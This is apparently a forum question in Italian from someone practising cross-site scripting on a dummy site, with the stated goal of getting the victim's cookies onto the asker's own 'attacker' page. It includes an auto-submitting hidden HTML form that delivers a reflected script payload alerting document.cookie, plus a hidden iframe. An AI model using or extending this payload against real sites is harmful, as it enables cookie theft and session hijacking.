Cercando di praticare XSS sul sito Web fittizio. Il mio obiettivo finale è quello di visualizzare i cookie della vittima sul mio sito "attaccante". Attualmente quello che ho è che quando l'utente entra nel mio sito, verrà visualizzato il sito Web fittizio e avviserà i cookie tramite javascript alle vittime. C'è un modo per fare in modo che l'avviso venga visualizzato sul mio sito utente malintenzionato?
<!DOCTYPE html>
<head></head>
<body>
<form name ='xss_form' action='http://dummy_site.com/search' method="GET">
<input type='hidden' name='query' value='<script>alert(document.cookie)</script>'>
</form>
<iframe name="hiddenFrame" style='display:none'></iframe>
<script>
document.xss_form.submit();
</script>
</body>
L'iframe è impostato in modo tale che, se esiste un modo per visualizzare la casella di avviso sul mio sito degli utenti malintenzionati, posso semplicemente impostare la destinazione del modulo sull'iframe e impedire il popup di dummy_site.